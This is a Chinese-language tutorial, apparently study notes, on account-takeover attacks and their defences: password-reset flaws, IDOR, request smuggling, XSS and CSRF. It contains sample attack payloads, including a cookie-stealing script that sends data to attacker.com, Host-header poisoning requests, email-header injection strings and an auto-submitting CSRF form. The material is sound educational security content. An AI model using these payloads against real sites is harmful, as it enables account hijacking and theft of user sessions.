## 一、基礎(chǔ)概念

### 1.1 什么是賬戶接管

賬戶接管（Account Takeover，簡(jiǎn)稱ATO）是網(wǎng)絡(luò)安全領(lǐng)域中一種嚴(yán)重的威脅，指攻擊者通過各種手段獲取用戶賬戶的未授權(quán)訪問權(quán)限。這種攻擊可能導(dǎo)致數(shù)據(jù)泄露、財(cái)務(wù)損失、隱私侵犯等嚴(yán)重后果。

### 1.2 攻擊面概覽

1. 密碼重置功能相關(guān)漏洞

? - 重置令牌泄露

? - 重置流程投毒

? - 參數(shù)污染

? - 業(yè)務(wù)邏輯缺陷

2. Web應(yīng)用程序漏洞利用

? - 跨站腳本（XSS）

? - HTTP請(qǐng)求走私

? - 跨站請(qǐng)求偽造（CSRF）

? - JWT相關(guān)漏洞

## 二、密碼重置相關(guān)攻擊技術(shù)

### 2.1 Referrer頭導(dǎo)致的令牌泄露

#### 技術(shù)原理

Referrer頭是HTTP請(qǐng)求頭的一部分，用于標(biāo)識(shí)請(qǐng)求來源。當(dāng)用戶從一個(gè)頁面跳轉(zhuǎn)到另一個(gè)頁面時(shí)，瀏覽器會(huì)自動(dòng)在請(qǐng)求中添加Referrer頭。

#### 攻擊流程

1. 觸發(fā)密碼重置請(qǐng)求并獲取重置鏈接

2. 進(jìn)入重置頁面但不完成重置

3. 點(diǎn)擊頁面上的第三方鏈接

4. 通過代理工具監(jiān)控請(qǐng)求

5. 分析Referrer頭中是否包含重置令牌

#### 潛在危害

- 重置令牌泄露可能導(dǎo)致攻擊者獲取賬戶控制權(quán)

- 可能造成大規(guī)模賬戶接管

- 用戶隱私信息可能被暴露

#### 防護(hù)建議

1. 實(shí)施Referrer-Policy頭部控制

```http

Referrer-Policy: no-referrer

```

2. 在重置頁面使用meta標(biāo)簽控制referrer

```html

<meta name="referrer" content="no-referrer">

```

3. 對(duì)重置令牌添加額外的安全驗(yàn)證

### 2.2 密碼重置投毒攻擊

#### 技術(shù)原理

這種攻擊利用了應(yīng)用程序在處理Host頭時(shí)的漏洞。當(dāng)應(yīng)用程序使用Host頭或X-Forwarded-Host頭來構(gòu)建密碼重置鏈接時(shí)，攻擊者可以通過修改這些頭部來控制重置鏈接的目標(biāo)地址。

#### 攻擊詳解

1. 基礎(chǔ)HTTP請(qǐng)求結(jié)構(gòu)：

```http

POST /reset-password HTTP/1.1

Host: legitimate-site.com

Content-Type: application/json

```

2. 攻擊者修改后的請(qǐng)求：

```http

POST /reset-password HTTP/1.1

Host: attacker.com

X-Forwarded-Host: attacker.com

Content-Type: application/json

```

#### 攻擊影響

1. 重置鏈接重定向到攻擊者控制的域名

2. 密碼重置令牌泄露

3. 受害者賬戶完全接管

#### 防護(hù)措施

1. 服務(wù)器端驗(yàn)證Host頭

2. 使用白名單限制允許的域名

3. 避免使用用戶可控的頭部來構(gòu)建URL

4. 實(shí)施強(qiáng)制性的二次驗(yàn)證機(jī)制

### 2.3 郵箱參數(shù)污染攻擊

#### 技術(shù)原理

郵箱參數(shù)污染攻擊利用了應(yīng)用程序在處理多值參數(shù)或特殊字符時(shí)的漏洞。

#### 攻擊方式詳解

1. 參數(shù)重復(fù)攻擊

```http

POST /reset-password

email=victim@mail.com&email=attacker@mail.com

```

2. JSON數(shù)組注入

```json

{

? "email": ["victim@mail.com", "attacker@mail.com"]

}

```

3. 郵件頭注入

```http

email=victim@mail.com%0A%0Dcc:attacker@mail.com

email=victim@mail.com%0A%0Dbcc:attacker@mail.com

```

4. 分隔符技巧

```http

email=victim@mail.com,attacker@mail.com

email=victim@mail.com%20attacker@mail.com

email=victim@mail.com|attacker@mail.com

```

#### 攻擊影響分析

1. 密碼重置郵件發(fā)送給攻擊者

2. 重置鏈接泄露

3. 郵件系統(tǒng)可能被濫用

#### 防護(hù)建議

1. 嚴(yán)格的郵箱格式驗(yàn)證

2. 單一值參數(shù)處理

3. 郵件頭注入防護(hù)

4. 實(shí)施速率限制

## 三、高級(jí)攻擊技術(shù)

### 3.1 IDOR漏洞利用

#### 技術(shù)原理

IDOR（不安全的直接對(duì)象引用）是一種訪問控制漏洞，允許攻擊者通過修改請(qǐng)求參數(shù)來訪問或修改其他用戶的數(shù)據(jù)。

#### 漏洞利用示例

1. 原始密碼修改請(qǐng)求：

```http

POST /api/changepass

Content-Type: application/json

{

? "userId": "123",

? "password": "newpassword"

}

```

2. 攻擊者修改后的請(qǐng)求：

```http

POST /api/changepass

Content-Type: application/json

{

? "userId": "456",? // 其他用戶的ID

? "password": "hackedpassword"

}

```

### 3.2 Unicode規(guī)范化漏洞

#### 技術(shù)原理

Unicode規(guī)范化是將不同的Unicode字符序列轉(zhuǎn)換為標(biāo)準(zhǔn)形式的過程。當(dāng)應(yīng)用程序在此過程中處理不當(dāng)時(shí)，可能導(dǎo)致安全問題。

#### 攻擊示例

1. 正常賬戶：`admin@example.com`

2. 攻擊者注冊(cè)：`adm?n@example.com`（使用Unicode字符'?'替代'i'）

#### 防護(hù)措施

1. 實(shí)施嚴(yán)格的字符集控制

2. 正確處理Unicode規(guī)范化

3. 使用規(guī)范的字符串比較方法

### 3.3 HTTP請(qǐng)求走私

#### 技術(shù)原理

HTTP請(qǐng)求走私利用了前端代理服務(wù)器和后端服務(wù)器對(duì)HTTP消息邊界的解釋差異。

#### 攻擊步驟

1. 檢測(cè)漏洞：

```bash

git clone https://github.com/defparam/smuggler.git

cd smuggler

python3 smuggler.py -u https://target.com

```

2. 構(gòu)造攻擊請(qǐng)求：

```http

POST / HTTP/1.1

Host: vulnerable.com

Content-Length: 6

Transfer-Encoding: chunked

0

GET /admin HTTP/1.1

Host: vulnerable.com

```

#### 防護(hù)建議

1. 規(guī)范化HTTP請(qǐng)求處理

2. 統(tǒng)一前后端服務(wù)器配置

3. 實(shí)施請(qǐng)求驗(yàn)證機(jī)制

## 四、Web漏洞導(dǎo)致的賬戶接管

### 4.1 XSS攻擊

#### 技術(shù)原理

跨站腳本（XSS）允許攻擊者在目標(biāo)網(wǎng)站注入惡意腳本，可用于竊取用戶會(huì)話。

#### 攻擊示例

```javascript

// 竊取cookie的payload

<script>

fetch('https://attacker.com/steal?cookie='+document.cookie);

</script>

```

### 4.2 CSRF攻擊

#### 技術(shù)原理

跨站請(qǐng)求偽造（CSRF）允許攻擊者誘導(dǎo)用戶執(zhí)行非預(yù)期的操作。

#### 攻擊示例

```html

<form action="https://bank.com/transfer" method="POST" id="evil-form">

? <input type="hidden" name="amount" value="1000">

? <input type="hidden" name="to" value="attacker">

</form>

<script>document.getElementById('evil-form').submit();</script>

```

## 五、預(yù)防措施和最佳實(shí)踐

### 5.1 通用安全建議

1. 密碼重置功能

? - 使用加密的、時(shí)效性的重置令牌

? - 實(shí)施多因素認(rèn)證

? - 限制重置請(qǐng)求頻率

2. API安全

? - 實(shí)施嚴(yán)格的訪問控制

? - 使用HTTPS加密傳輸

? - 驗(yàn)證所有用戶輸入

3. 會(huì)話管理

? - 使用安全的會(huì)話ID

? - 實(shí)施會(huì)話超時(shí)

? - 防止會(huì)話固定攻擊

### 5.2 開發(fā)建議

1. 輸入驗(yàn)證

```python

import re

def validate_email(email):

? ? pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'

? ? return bool(re.match(pattern, email))

```

2. CSRF防護(hù)

```python

from django.middleware.csrf import get_token

def secure_form(request):

? ? csrf_token = get_token(request)

? ? return render(request, 'form.html', {'csrf_token': csrf_token})

```

3. 安全頭部配置

```nginx

add_header X-Frame-Options "DENY";

add_header X-XSS-Protection "1; mode=block";

add_header Content-Security-Policy "default-src 'self'";

```

## 六、結(jié)論

賬戶接管攻擊涉及多個(gè)技術(shù)層面，需要開發(fā)者和安全團(tuán)隊(duì)共同努力來防范。通過實(shí)施多層次的安全措施，可以顯著降低被攻擊的風(fēng)險(xiǎn)。關(guān)鍵是要保持警惕，及時(shí)更新安全知識(shí)，定期進(jìn)行安全審計(jì)，并始終遵循安全開發(fā)的最佳實(shí)踐。

安全不是一次性的工作，而是需要持續(xù)改進(jìn)的過程。在實(shí)際應(yīng)用中，要根據(jù)具體場(chǎng)景和需求，選擇合適的安全措施，并確保這些措施能夠有效執(zhí)行。

關(guān)注微信公眾號(hào)，獲取最新學(xué)習(xí)筆記！